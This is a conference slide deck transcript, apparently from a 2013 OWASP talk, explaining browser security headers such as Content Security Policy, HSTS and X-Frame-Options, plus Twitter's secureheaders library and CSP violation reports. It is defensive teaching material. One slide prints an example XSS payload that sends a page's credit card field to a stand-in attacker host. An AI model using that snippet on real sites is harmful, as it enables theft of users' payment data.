Owasp austin

@ LASCONATX
April 30, 2013
CSP To the
Rescue

@LASCONATX April 2013
@ndm | @SeeEssPee | @sadb | @twittersecurity
It’s all about me
I’ve been called a jackass
I’ve been called an “appsechole”
I have opinions
Opinions are often wrong
Please disagree with me
That’s how we learn

CSP
Brakeman
ThreatDeckPhantom Gang
Roshambo
Email
developers
Email
security

Code review
External reports
Pen testing
Static analysis tools
Dynamic analysis tools
CSP

Get the right information to the
right people

Find bugs as quickly as possible

Do you use these?
Content security policy
X-Frame-Options
HTTP Strict Transport Security
X-Xss-Protection
X-Content-Type-Options

I’m already bored
Time to get awesomer

Security headers
Leverage the browser for security

Sweeeeet. I don’t have write secure code!

Time of convergence

Should you?

X-ContentType-Options
Fixes mime sniffing attacks
Only applies to IE, because only IE would do something
like this
X-Content-Type-Options = ‘nosniff’
zzzzZZZZZZzzzzz

X-Xss-Protection
Use the browser’s built in XSS Auditor
X-Xss-Protection: [0-1](; mode=block)?
X-Xss-Protection: 1; mode=block
zzzzZZZ... huh? zzzzzzzz

X-Frame-Options
Protects you from most classes of
Clickjacking
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW FROM example.com
zzz... oh hey thats cool. Don’t frame my stuff.

X-Frame-Options

Firesheep/SSL Strip
Given I don’t have an HSTS header
And I have a session
When I visit http://example.com
Then I am pwned

Other ssl fails
Posting passwords over HTTP
Loading mixed content
Using protocol relative URLS

Strict Transport Security

How hard is it to use?
Base Case
Strict-transport-security: max-age=10000000
Do all of your subdomains support SSL?
Strict-transport-security: max-age=10000000; includeSubdomains

Content secur-a-wat?
Content security policy is reshaping the security model
It is a complicated spec with great differences across browsers
It is not widely adopted
However!
It completely eliminates reflected and stored XSS
It ensures that you never load mixed content
It allows you to accept arbitrary html code from users

Wat? Sounds cool.
script-src
style-src
img-src
default-src
frame-src
connect-src
font-src
media-src
object-src
report-uri

QuickTime™ and a
H.264 decompressor
are needed to see this picture.

Get rid of XSS, eh?
A script-src directive that doesn’t contain ‘unsafe-inline’ almost
eliminates most forms of cross site scripting.
I WILL NOT WRITE INLINE JAVASCRIPT

But I have to...
OK, then I’ll inject:
<script>
var image = new Image();
image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();
</script>
FALSE! img-src violation, no XHR allowed

Inline css too? WTF?

How to apply?
Secure headers! (poor name, I know)
Open sourced earlier this year
https://github.com/twitter/secureheaders

How does it work?
It sets a before_filter that applies each header
Values are based on options passed to filter, or in an initializer
Easily overridden
Secure by default!!!

What about that security policy thingy
There are > 6 differences between these two header values

Yay for standards
https://t.co/f26WWx3r7y

Long hair don’t care
About browser inconsistencies

W3
Get involved!!!
Key results from F2F in San Jose

Line numbers and column numbers
Previously, a report that was caused by inline scripts/styles was cryptic
Original FF implementation contained a script-sample
Evals/inserting script into DOM would be buried in minified JS

“sudo for javascript”
Bookmarklets/plugins/etc
How should they behave?
Bookmarklets show clear intention
Plugins somewhat questionable
Need to live outside the control of the parent page
But how?

Reporting cross-origin
Original implementation did not allow CSP reports to be sent to a URI
that does not match the same origin policy, using the eTLD
e.g. https://ads.twitter.com can send reports to https://twitter.com,
but not http://twitter.com or https://support.twitter.com or https://twitter.com:3000
As a result of the w3 face to face, the 1.0 spec shall say that reports can
be sent anywhere!
However, cross-origin requests not allowed by CORS will be “unauthenticated”

script-(nonce|hash)
The clash of the titans

Future

You mean there’s more on CSP?
The browser sends reports!

What does the report look like?
{
"csp-report"=> {
"document-uri"=>"http://localhost:3000/home",
"referrer"=>"",
"blocked-uri"=>"ws://localhost:35729/livereload",
"violated-directive"=>"xhr-src ws://localhost.twitter.com:*"
}
}

Quiz: what does this report indicate?
{
"csp-report"=> {
"document-uri"=>"http://example.com/welcome",
"referrer"=>"",
"blocked-uri"=>"self",
"violated-directive"=>"inline script base restriction",
"source-file"=>"http://example.com/welcome",
"script-sample"=>"alert(1)",
"line-number"=>81,
"column-number"=>1463,
}
}

Monitor and Tune ALL the things

Splunk

Trending and anomalies

Header status page

Owasp austin

Recomendados

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Destacado

Destacado (20)

Similar a Owasp austin

Similar a Owasp austin (20)

Más de Neil Matatall

Más de Neil Matatall (6)

Owasp austin

Notas del editor